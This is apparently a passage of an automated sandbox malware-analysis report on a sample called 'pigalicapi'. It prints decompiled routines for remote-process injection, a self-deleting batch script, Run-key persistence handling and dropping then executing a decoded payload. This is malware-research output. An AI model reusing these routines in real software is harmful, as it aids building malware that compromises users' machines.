                                                                                                                                                                                                                                                                            • CryptDestroyKey.ADVAPI32(00000000), ref: 01178DFE
                                                                                                                                                                                                                                                                            • CryptDestroyHash.ADVAPI32(00000000), ref: 01178E08
                                                                                                                                                                                                                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 01178E14
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 01178D30
                                                                                                                                                                                                                                                                            • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 01178D68
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Crypt$ContextHash$AcquireDestroy$CreateDataDecryptDeriveErrorLastRelease
                                                                                                                                                                                                                                                                            • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                            • API String ID: 3718126946-947817771
                                                                                                                                                                                                                                                                            • Opcode ID: fb87c9ad494d066d7b2da7758ef9c8215fa6a5b32a3fad43faa2e63256700134
                                                                                                                                                                                                                                                                            • Instruction ID: 9076359559ac2a612ce2934c9e84a8d67b932873d039203f0ff389179634e501
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb87c9ad494d066d7b2da7758ef9c8215fa6a5b32a3fad43faa2e63256700134
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E0311275A40209EBEB29CF94D84DFEF7779BB44705F148518F611A6384CBB49A84CBA0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E01172510(void* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                                                                            				long _v12;
                                                                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                                                            				long _v28;
                                                                                                                                                                                                                                                                            				void* _v32;
                                                                                                                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                                                                                                                            				void* _t138;
                                                                                                                                                                                                                                                                            				void* _t139;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                            					L14:
                                                                                                                                                                                                                                                                            					return _v8;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_v24 = _a8 +  *((intOrPtr*)(_a8 + 0x3c));
                                                                                                                                                                                                                                                                            					_v20 = _v24 + ( *(_v24 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                                                                                                                            					_v12 =  *((intOrPtr*)(_v24 + 0x50));
                                                                                                                                                                                                                                                                            					_v16 = VirtualAlloc(0, _v12, 0x3000, 0x40);
                                                                                                                                                                                                                                                                            					if(_v16 != 0) {
                                                                                                                                                                                                                                                                            						_v32 = VirtualAllocEx(_a4,  *(_v24 + 0x34), _v12, 0x3000, 0x40);
                                                                                                                                                                                                                                                                            						if(_v32 != 0) {
                                                                                                                                                                                                                                                                            							L7:
                                                                                                                                                                                                                                                                            							E01177B70(_v16, _a8,  *((intOrPtr*)(_v24 + 0x54)));
                                                                                                                                                                                                                                                                            							_t139 = _t138 + 0xc;
                                                                                                                                                                                                                                                                            							_v36 = 0;
                                                                                                                                                                                                                                                                            							while(_v36 < ( *(_v24 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                                                                                            								E01177B70(_v16 +  *((intOrPtr*)(_v20 + 0xc + _v36 * 0x28)), _a8 +  *((intOrPtr*)(_v20 + 0x14 + _v36 * 0x28)),  *((intOrPtr*)(_v20 + 0x10 + _v36 * 0x28)));
                                                                                                                                                                                                                                                                            								_t139 = _t139 + 0xc;
                                                                                                                                                                                                                                                                            								_v36 = _v36 + 1;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							E011726D0(_v16, _v32);
                                                                                                                                                                                                                                                                            							if(WriteProcessMemory(_a4, _v32, _v16, _v12, 0) != 0) {
                                                                                                                                                                                                                                                                            								VirtualFree(_v16, 0, 0x8000);
                                                                                                                                                                                                                                                                            								_v28 = 0;
                                                                                                                                                                                                                                                                            								_v8 = CreateRemoteThread(_a4, 0, 0, _v32 +  *((intOrPtr*)(_v24 + 0x28)), 0x11, 0,  &_v28);
                                                                                                                                                                                                                                                                            								goto L14;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							VirtualFree(_v16, 0, 0x8000);
                                                                                                                                                                                                                                                                            							return 0;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v32 = VirtualAllocEx(_a4, 0, _v12, 0x103000, 0x40);
                                                                                                                                                                                                                                                                            						if(_v32 != 0) {
                                                                                                                                                                                                                                                                            							goto L7;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						VirtualFree(_v16, 0, 0x8000);
                                                                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                                                            0x01172516
                                                                                                                                                                                                                                                                            0x01172521
                                                                                                                                                                                                                                                                            0x011726c2
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01172531
                                                                                                                                                                                                                                                                            0x0117253a
                                                                                                                                                                                                                                                                            0x0117254b
                                                                                                                                                                                                                                                                            0x01172554
                                                                                                                                                                                                                                                                            0x0117256a
                                                                                                                                                                                                                                                                            0x01172571
                                                                                                                                                                                                                                                                            0x01172596
                                                                                                                                                                                                                                                                            0x0117259d
                                                                                                                                                                                                                                                                            0x011725d7
                                                                                                                                                                                                                                                                            0x011725e6
                                                                                                                                                                                                                                                                            0x011725eb
                                                                                                                                                                                                                                                                            0x011725ee
                                                                                                                                                                                                                                                                            0x01172600
                                                                                                                                                                                                                                                                            0x0117263c
                                                                                                                                                                                                                                                                            0x01172641
                                                                                                                                                                                                                                                                            0x011725fd
                                                                                                                                                                                                                                                                            0x011725fd
                                                                                                                                                                                                                                                                            0x0117264e
                                                                                                                                                                                                                                                                            0x01172670
                                                                                                                                                                                                                                                                            0x01172692
                                                                                                                                                                                                                                                                            0x01172698
                                                                                                                                                                                                                                                                            0x011726bf
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x011726bf
                                                                                                                                                                                                                                                                            0x0117267d
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01172683
                                                                                                                                                                                                                                                                            0x011725b6
                                                                                                                                                                                                                                                                            0x011725bd
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x011725ca
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x011725d0
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01172573

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 01172564
                                                                                                                                                                                                                                                                            • VirtualAllocEx.KERNEL32(00000000,?,00000000,00003000,00000040), ref: 01172590
                                                                                                                                                                                                                                                                            • VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00103000,00000040), ref: 011725B0
                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 011725CA
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Virtual$Alloc$Free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3668210933-0
                                                                                                                                                                                                                                                                            • Opcode ID: 701fa04248884fdb2637cf36bbfcbbffc4e794078274e79bc0bdd4193577f38b
                                                                                                                                                                                                                                                                            • Instruction ID: 2d93260eb86dfb1c9dfa6301998fa91beff7a149e68a58a4044a6bb1c223d128
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 701fa04248884fdb2637cf36bbfcbbffc4e794078274e79bc0bdd4193577f38b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 05510EB5E00209AFDB18CF94C895FAEB7B5BB48304F108559FA15AB384D774A981CFA0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                                                            			E011774A0() {
                                                                                                                                                                                                                                                                            				char _v524;
                                                                                                                                                                                                                                                                            				CHAR* _v528;
                                                                                                                                                                                                                                                                            				void* _v532;
                                                                                                                                                                                                                                                                            				void* _v536;
                                                                                                                                                                                                                                                                            				void* _v540;
                                                                                                                                                                                                                                                                            				char _v1060;
                                                                                                                                                                                                                                                                            				char _v1580;
                                                                                                                                                                                                                                                                            				char _v2364;
                                                                                                                                                                                                                                                                            				long _v2368;
                                                                                                                                                                                                                                                                            				struct _PROCESS_INFORMATION _v2384;
                                                                                                                                                                                                                                                                            				long _v2388;
                                                                                                                                                                                                                                                                            				struct _STARTUPINFOA _v2460;
                                                                                                                                                                                                                                                                            				void* _t86;
                                                                                                                                                                                                                                                                            				void* _t121;
                                                                                                                                                                                                                                                                            				void* _t123;
                                                                                                                                                                                                                                                                            				void* _t124;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				E01177D20(E01177D20( &_v2364,  &_v2364, 0, 0x30c),  &_v1060, 0, 0x208);
                                                                                                                                                                                                                                                                            				_t123 = _t121 + 0x18;
                                                                                                                                                                                                                                                                            				 *0x1184370 = 1;
                                                                                                                                                                                                                                                                            				Sleep(0x3e8);
                                                                                                                                                                                                                                                                            				if(( *0x1184362 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            					_v2368 = 0x207;
                                                                                                                                                                                                                                                                            					if(( *0x118435a & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            						GetEnvironmentVariableA("USERPROFILE",  &_v1060, 0x207);
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						__imp__GetAllUsersProfileDirectoryA( &_v1060,  &_v2368);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					lstrcatA( &_v1060, "\\");
                                                                                                                                                                                                                                                                            					lstrcatA( &_v1060, "pigalicapi");
                                                                                                                                                                                                                                                                            					lstrcatA( &_v1060, ".exe");
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					GetModuleFileNameA(0,  &_v1060, 0x207);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				SetFileAttributesA( &_v1060, 0x80);
                                                                                                                                                                                                                                                                            				wnsprintfA( &_v2364, 0x30b, ":repeat\r\ndel %s\r\nif exist %s goto :repeat\r\ndel %%0",  &_v1060,  &_v1060);
                                                                                                                                                                                                                                                                            				_t124 = _t123 + 0x14;
                                                                                                                                                                                                                                                                            				if( *0x118436c != 0) {
                                                                                                                                                                                                                                                                            					_t86 =  *0x118436c; // 0x254
                                                                                                                                                                                                                                                                            					TerminateThread(_t86, 1);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_v528 = "software\\microsoft\\windows\\currentversion\\run";
                                                                                                                                                                                                                                                                            				_v532 = 0x80000001;
                                                                                                                                                                                                                                                                            				if(( *0x118435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            					_v532 = 0x80000002;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_v536 = 0;
                                                                                                                                                                                                                                                                            				if(RegOpenKeyExA(_v532, _v528, 0, 2,  &_v536) == 0) {
                                                                                                                                                                                                                                                                            					RegDeleteValueA(_v536, "pigalicapi");
                                                                                                                                                                                                                                                                            					RegCloseKey(_v536);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				if(( *0x118435b & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            					E01175E30(1);
                                                                                                                                                                                                                                                                            					_t124 = _t124 + 4;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				GetEnvironmentVariableA("TEMP",  &_v1580, 0x104);
                                                                                                                                                                                                                                                                            				GetTempFileNameA( &_v1580, "slf", GetTickCount() % 0xffff,  &_v524);
                                                                                                                                                                                                                                                                            				lstrcatA( &_v524, ".bat");
                                                                                                                                                                                                                                                                            				_t71 = CreateFileA( &_v524, 0x40000000, 1, 0, 2, 0, 0);
                                                                                                                                                                                                                                                                            				_v540 = _t71;
                                                                                                                                                                                                                                                                            				if(_v540 != 0xffffffff) {
                                                                                                                                                                                                                                                                            					_v2388 = 0;
                                                                                                                                                                                                                                                                            					WriteFile(_v540,  &_v2364, lstrlenA( &_v2364),  &_v2388, 0);
                                                                                                                                                                                                                                                                            					E01177D20(E01177D20(CloseHandle(_v540),  &_v2384, 0, 0x10),  &_v2460, 0, 0x44);
                                                                                                                                                                                                                                                                            					_v2460.cb = 0x44;
                                                                                                                                                                                                                                                                            					_v2460.dwFlags = _v2460.dwFlags | 0x00000001;
                                                                                                                                                                                                                                                                            					_v2460.wShowWindow = 0;
                                                                                                                                                                                                                                                                            					if(CreateProcessA(0,  &_v524, 0, 0, 0, 0, 0, 0,  &_v2460,  &_v2384) != 0) {
                                                                                                                                                                                                                                                                            						_t71 = CloseHandle(_v2384.hThread);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					ExitProcess(0);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _t71;
                                                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                                                            0x011774cd
                                                                                                                                                                                                                                                                            0x011774d2
                                                                                                                                                                                                                                                                            0x011774d5
                                                                                                                                                                                                                                                                            0x011774e4
                                                                                                                                                                                                                                                                            0x011774f3
                                                                                                                                                                                                                                                                            0x0117750b
                                                                                                                                                                                                                                                                            0x0117751e
                                                                                                                                                                                                                                                                            0x01177547
                                                                                                                                                                                                                                                                            0x01177520
                                                                                                                                                                                                                                                                            0x0117752e
                                                                                                                                                                                                                                                                            0x0117752e
                                                                                                                                                                                                                                                                            0x01177559
                                                                                                                                                                                                                                                                            0x0117756b
                                                                                                                                                                                                                                                                            0x0117757d
                                                                                                                                                                                                                                                                            0x011774f5
                                                                                                                                                                                                                                                                            0x01177503
                                                                                                                                                                                                                                                                            0x01177503
                                                                                                                                                                                                                                                                            0x0117758f
                                                                                                                                                                                                                                                                            0x011775b4
                                                                                                                                                                                                                                                                            0x011775ba
                                                                                                                                                                                                                                                                            0x011775c4
                                                                                                                                                                                                                                                                            0x011775c8
                                                                                                                                                                                                                                                                            0x011775ce
                                                                                                                                                                                                                                                                            0x011775ce
                                                                                                                                                                                                                                                                            0x011775d4
                                                                                                                                                                                                                                                                            0x011775de
                                                                                                                                                                                                                                                                            0x011775f1
                                                                                                                                                                                                                                                                            0x011775f3
                                                                                                                                                                                                                                                                            0x011775f3
                                                                                                                                                                                                                                                                            0x011775fd
                                                                                                                                                                                                                                                                            0x01177628
                                                                                                                                                                                                                                                                            0x01177636
                                                                                                                                                                                                                                                                            0x01177643
                                                                                                                                                                                                                                                                            0x01177643
                                                                                                                                                                                                                                                                            0x01177652
                                                                                                                                                                                                                                                                            0x01177656
                                                                                                                                                                                                                                                                            0x0117765b
                                                                                                                                                                                                                                                                            0x0117765b
                                                                                                                                                                                                                                                                            0x0117766f
                                                                                                                                                                                                                                                                            0x01177698
                                                                                                                                                                                                                                                                            0x011776aa
                                                                                                                                                                                                                                                                            0x011776c6
                                                                                                                                                                                                                                                                            0x011776cc
                                                                                                                                                                                                                                                                            0x011776d9
                                                                                                                                                                                                                                                                            0x011776df
                                                                                                                                                                                                                                                                            0x0117770e
                                                                                                                                                                                                                                                                            0x0117773f
                                                                                                                                                                                                                                                                            0x01177747
                                                                                                                                                                                                                                                                            0x0117775a
                                                                                                                                                                                                                                                                            0x01177762
                                                                                                                                                                                                                                                                            0x01177794
                                                                                                                                                                                                                                                                            0x0117779d
                                                                                                                                                                                                                                                                            0x0117779d
                                                                                                                                                                                                                                                                            0x011777a5
                                                                                                                                                                                                                                                                            0x011777a5
                                                                                                                                                                                                                                                                            0x011777ae

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 011774E4
                                                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000207), ref: 01177503
                                                                                                                                                                                                                                                                            • GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 0117752E
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,0117C650), ref: 01177559
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,pigalicapi), ref: 0117756B
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,.exe), ref: 0117757D
                                                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000080), ref: 0117758F
                                                                                                                                                                                                                                                                            • wnsprintfA.SHLWAPI ref: 011775B4
                                                                                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000254,00000001), ref: 011775CE
                                                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,0117C690,00000000,00000002,00000000), ref: 01177620
                                                                                                                                                                                                                                                                            • RegDeleteValueA.ADVAPI32(00000000,pigalicapi), ref: 01177636
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 01177643
                                                                                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104), ref: 0117766F
                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 0117767C
                                                                                                                                                                                                                                                                            • GetTempFileNameA.KERNEL32(?,slf,00000000), ref: 01177698
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,.bat), ref: 011776AA
                                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 011776C6
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,00000000,00000000), ref: 011776F9
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(000000FF,?,00000000), ref: 0117770E
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 0117771B
                                                                                                                                                                                                                                                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0117778C
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0117779D
                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 011777A5
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$lstrcat$Close$CreateHandleNameProcess$AttributesCountDeleteDirectoryEnvironmentExitModuleOpenProfileSleepTempTerminateThreadTickUsersValueVariableWritelstrlenwnsprintf
                                                                                                                                                                                                                                                                            • String ID: .bat$.exe$:repeatdel %sif exist %s goto :repeatdel %%0$D$TEMP$USERPROFILE$pigalicapi$slf$software\microsoft\windows\currentversion\run
                                                                                                                                                                                                                                                                            • API String ID: 3221898725-1842671280
                                                                                                                                                                                                                                                                            • Opcode ID: 9531138b7438857b3a05d90b0a3a44a835347f2769343115aa9647b03c1a1054
                                                                                                                                                                                                                                                                            • Instruction ID: c6e5e728ba171d8389dfbb67d86cdfec634c1547f31fa7716e04b3ea56041fde
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9531138b7438857b3a05d90b0a3a44a835347f2769343115aa9647b03c1a1054
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA7186B5A4031AABEB38DB60DC4DFEA7778AB44704F0445A8F219A5285DBB057C4CFD0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                                                                            			E01176DA0(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                                                                                                                            				char _v32;
                                                                                                                                                                                                                                                                            				void* _v36;
                                                                                                                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _v40;
                                                                                                                                                                                                                                                                            				long _v44;
                                                                                                                                                                                                                                                                            				void* _v48;
                                                                                                                                                                                                                                                                            				void* _v52;
                                                                                                                                                                                                                                                                            				void* _v56;
                                                                                                                                                                                                                                                                            				char _v324;
                                                                                                                                                                                                                                                                            				void* _v328;
                                                                                                                                                                                                                                                                            				char _v340;
                                                                                                                                                                                                                                                                            				char _v604;
                                                                                                                                                                                                                                                                            				long _v608;
                                                                                                                                                                                                                                                                            				int _v612;
                                                                                                                                                                                                                                                                            				long _v616;
                                                                                                                                                                                                                                                                            				void* _v620;
                                                                                                                                                                                                                                                                            				long _v624;
                                                                                                                                                                                                                                                                            				intOrPtr _v628;
                                                                                                                                                                                                                                                                            				void* _v632;
                                                                                                                                                                                                                                                                            				intOrPtr _t198;
                                                                                                                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _t217;
                                                                                                                                                                                                                                                                            				void* _t223;
                                                                                                                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _t248;
                                                                                                                                                                                                                                                                            				void* _t347;
                                                                                                                                                                                                                                                                            				void* _t349;
                                                                                                                                                                                                                                                                            				void* _t350;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = _a4;
                                                                                                                                                                                                                                                                            				if(_v8 == 0) {
                                                                                                                                                                                                                                                                            					L39:
                                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				Sleep( *(_v8 + 0x14) * 0x3c * 0x3e8);
                                                                                                                                                                                                                                                                            				__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                            				_v32 =  *_v8;
                                                                                                                                                                                                                                                                            				_v28 =  *((intOrPtr*)(_v8 + 4));
                                                                                                                                                                                                                                                                            				_v24 =  *((intOrPtr*)(_v8 + 8));
                                                                                                                                                                                                                                                                            				_v12 =  *(_v8 + 0x14);
                                                                                                                                                                                                                                                                            				_v20 =  *(_v8 + 0xc);
                                                                                                                                                                                                                                                                            				_v16 =  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                                                                                                                                            				if(( *(_v8 + 0xc) & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                            					GetEnvironmentVariableA("TEMP",  &_v604, 0x104);
                                                                                                                                                                                                                                                                            					E01177D20( &_v340,  &_v340, 0, 0xa);
                                                                                                                                                                                                                                                                            					E01179730( &_v340, 4);
                                                                                                                                                                                                                                                                            					_t349 = _t347 + 0x14;
                                                                                                                                                                                                                                                                            					GetTempFileNameA( &_v604,  &_v340, GetTickCount() % 0xffff,  &_v324);
                                                                                                                                                                                                                                                                            					_v328 = CreateFileA( &_v324, 0x40000000, 1, 0, 2, 0, 0);
                                                                                                                                                                                                                                                                            					if(_v328 != 0xffffffff) {
                                                                                                                                                                                                                                                                            						_v608 = 0;
                                                                                                                                                                                                                                                                            						_v612 = 0;
                                                                                                                                                                                                                                                                            						_v616 =  *(_v8 + 0x1c);
                                                                                                                                                                                                                                                                            						if(( *(_v8 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                            							_v612 = WriteFile(_v328,  *(_v8 + 0x18),  *(_v8 + 0x1c),  &_v608, 0);
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							_v624 =  *((intOrPtr*)( *(_v8 + 0x1c) +  *(_v8 + 0x18) - 4));
                                                                                                                                                                                                                                                                            							_v620 = VirtualAlloc(0, _v624, 0x3000, 4);
                                                                                                                                                                                                                                                                            							if(_v620 != 0) {
                                                                                                                                                                                                                                                                            								if(E01176260(_v8,  *(_v8 + 0x18),  *(_v8 + 0x1c), _v620, _v624) == _v624) {
                                                                                                                                                                                                                                                                            									_v612 = WriteFile(_v328, _v620, _v624,  &_v608, 0);
                                                                                                                                                                                                                                                                            									_v616 = _v624;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								VirtualFree(_v620, 0, 0x8000);
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						CloseHandle(_v328);
                                                                                                                                                                                                                                                                            						if(_v612 != 0 && _v608 == _v616) {
                                                                                                                                                                                                                                                                            							_t198 = E01171E60( &_v324);
                                                                                                                                                                                                                                                                            							_t350 = _t349 + 4;
                                                                                                                                                                                                                                                                            							_v628 = _t198;
                                                                                                                                                                                                                                                                            							if(_v628 != 0) {
                                                                                                                                                                                                                                                                            								if( *((intOrPtr*)(_v8 + 0x10)) != 0) {
                                                                                                                                                                                                                                                                            									E011773C0( &_v32,  *(_v8 + 0x18),  *(_v8 + 0x1c));
                                                                                                                                                                                                                                                                            									_t350 = _t350 + 0xc;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								if(( *(_v8 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                            									E01172510(_v628, 0x117e290);
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					L38:
                                                                                                                                                                                                                                                                            					__imp__CoUninitialize();
                                                                                                                                                                                                                                                                            					goto L39;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_v40 = 0;
                                                                                                                                                                                                                                                                            				_v36 = 0;
                                                                                                                                                                                                                                                                            				_v44 = 0;
                                                                                                                                                                                                                                                                            				if(( *(_v8 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                            					_t217 = E01172070( *(_v8 + 0x18));
                                                                                                                                                                                                                                                                            					_t347 = _t347 + 4;
                                                                                                                                                                                                                                                                            					_v40 = _t217;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_v44 =  *((intOrPtr*)( *(_v8 + 0x1c) +  *(_v8 + 0x18) - 4));
                                                                                                                                                                                                                                                                            					_v48 = VirtualAlloc(0, _v44, 0x3000, 4);
                                                                                                                                                                                                                                                                            					if(_v48 != 0) {
                                                                                                                                                                                                                                                                            						if(E01176260( *(_v8 + 0x1c),  *(_v8 + 0x18),  *(_v8 + 0x1c), _v48, _v44) == _v44) {
                                                                                                                                                                                                                                                                            							_t248 = E01172070(_v48);
                                                                                                                                                                                                                                                                            							_t347 = _t347 + 4;
                                                                                                                                                                                                                                                                            							_v40 = _t248;
                                                                                                                                                                                                                                                                            							if(( *(_v8 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                            								_v36 = VirtualAlloc(0, _v44, 0x3000, 4);
                                                                                                                                                                                                                                                                            								E01177B70(_v36, _v48, _v44);
                                                                                                                                                                                                                                                                            								_t347 = _t347 + 0xc;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						VirtualFree(_v48, 0, 0x8000);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				if(_v40 == 0) {
                                                                                                                                                                                                                                                                            					L22:
                                                                                                                                                                                                                                                                            					goto L38;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					if( *((intOrPtr*)(_v8 + 0x10)) != 0) {
                                                                                                                                                                                                                                                                            						E011773C0( &_v32,  *(_v8 + 0x18),  *(_v8 + 0x1c));
                                                                                                                                                                                                                                                                            						_t347 = _t347 + 0xc;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(( *(_v8 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                            						_t223 = E011797A0(0x10);
                                                                                                                                                                                                                                                                            						_t347 = _t347 + 4;
                                                                                                                                                                                                                                                                            						_v632 = _t223;
